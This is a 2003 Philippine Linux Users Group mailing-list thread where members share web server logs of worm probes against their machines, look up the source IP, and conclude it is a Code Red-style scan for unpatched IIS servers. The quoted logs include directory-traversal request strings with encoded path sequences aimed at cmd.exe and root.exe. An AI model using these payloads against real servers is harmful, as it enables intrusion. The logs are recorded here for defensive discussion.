A person from the DigitalFilipino mailing list was also attacked by the same person / computer recently. His/Her logs show
<snip> [Sun Feb 16 21:32:12 2003] [error] [client 202.138.135.3] File does not exist: /var/www/html/scripts/..%2f../winnt/system32/cmd.exe [Sun Feb 16 21:57:12 2003] [error] [client 202.138.135.3] File does not exist: /var/www/html/scripts/root.exe [Sun Feb 16 21:57:13 2003] [error] [client 202.138.135.3] File does not exist: /var/www/html/MSADC/root.exe On Tue, 2003-02-18 at 10:07, [EMAIL PROTECTED] wrote: > Fellow, > U mean that this ip address from Non-authoritative answer: want to hack > 3.135.138.202.in-addr.arpa name = reol.ph. - this one? 202.138.135.3 > 3.135.138.202.in-addr.arpa name = proxy.reol.ph. this one? > > Authoritative answers can be found from: > 135.138.202.in-addr.arpa nameserver = dns02.digitelone.com. > 135.138.202.in-addr.arpa nameserver = dns01.digitelone.com. > dns01.digitelone.com internet address = 202.138.128.1 > dns02.digitelone.com internet address = 202.138.128.2 > > Anong makukuha nya sa server ko? y is that something a > winnt\system32\cmd.exe? IIS for MS app. > oninz > > > code red or some other worm scanning for vulnerable IIS webservers to > > infect > > > > no worries... unless you got an unpatched IIS box :) > > > > Allen Umlas wrote: > > > >> > >> 202.54.67.195 - - [17/Feb/2003:16:09:02 +0800] "0^A^E6pæ^óÛ} > >> 6ZÆ»æh9ÔÜA^E6pæ^óÛ} 6ZÆ»æh9Ô4.0 ($ > >> 202.54.67.195 - - [17/Feb/2003:16:09:51 +0800] "0^A^E6pæ^óÛ} > >> 6ZÆ»æh9ÔÝé0^A^E6pæ^óÛ} 6ZÆ»æh9Ô "$ > >> 202.54.67.195 - - [17/Feb/2003:16:10:08 +0800] > >> "ß ¾U4Û&^_Åÿ$^_ðÖaÞpß ¾U4Û&^_Åÿ$^_ðÖaÞpß$0 1501 > >> 202.138.177.36 - - [17/Feb/2003:16:13:34 +0800] "GET > >> /webmail/src/left_main.php HTTP/1.1" 200 1902 > >> 202.138.135.3 - - [17/Feb/2003:16:15:25 +0800] "GET > >> /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-$ > >> 202.138.135.3 - - [17/Feb/2003:16:15:39 +0800] "GET > >> /MSADC/root.exe?/c+dir HTTP/1.0" 404 281 "-" $ > >> 202.138.135.3 - - [17/Feb/2003:16:15:40 +0800] "GET > >> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 40$ > >> 202.138.135.3 - - [17/Feb/2003:16:15:42 +0800] "GET > >> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 40$ > >> 202.138.135.3 - - [17/Feb/2003:16:15:44 +0800] "GET > >> /scripts/..%255c../winnt/system32/cmd.exe?/c+$ > >> 202.138.135.3 - - [17/Feb/2003:16:15:46 +0800] "GET > >> /_vti_bin/..%255c../..%255c../..%255c../winnt$ > >> 202.138.135.3 - - [17/Feb/2003:16:15:51 +0800] "GET > >> /_mem_bin/..%255c../..%255c../..%255c../winnt$ > >> 202.138.135.3 - - [17/Feb/2003:16:15:53 +0800] "GET > >> /msadc/..%255c../..%255c../..%255c/..%c1%1c..$ > >> 202.138.135.3 - - [17/Feb/2003:16:15:57 +0800] "GET > >> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c$ > >> 202.138.135.3 - - [17/Feb/2003:16:16:20 +0800] "GET > >> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c$ > >> 202.138.135.3 - - [17/Feb/2003:16:16:25 +0800] "GET > >> /scripts/..%c0%af../winnt/system32/cmd.exe?/c$ > >> 202.138.135.3 - - [17/Feb/2003:16:16:30 +0800] "GET > >> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c$ > >> 202.138.135.3 - - [17/Feb/2003:16:16:37 +0800] "GET > >> /scripts/..%%35%63../winnt/system32/cmd.exe?/$ > >> 202.138.135.3 - - [17/Feb/2003:16:16:42 +0800] "GET > >> /scripts/..%%35c../winnt/system32/cmd.exe?/c+ > >> 202.138.135.3 - - [17/Feb/2003:16:16:47 +0800] "GET > >> /scripts/..%25%35%63../winnt/system32/cmd.exe$ > >> > >> > >> oninz _ Philippine Linux Users Group. Web site and archives at http://plug.linux.org.ph To leave: send "unsubscribe" in the body to [EMAIL PROTECTED] Fully Searchable Archives With Friendly Web Interface at http://marc.free.net.ph To subscribe to the Linux Newbies' List: send "subscribe" in the body to [EMAIL PROTECTED]
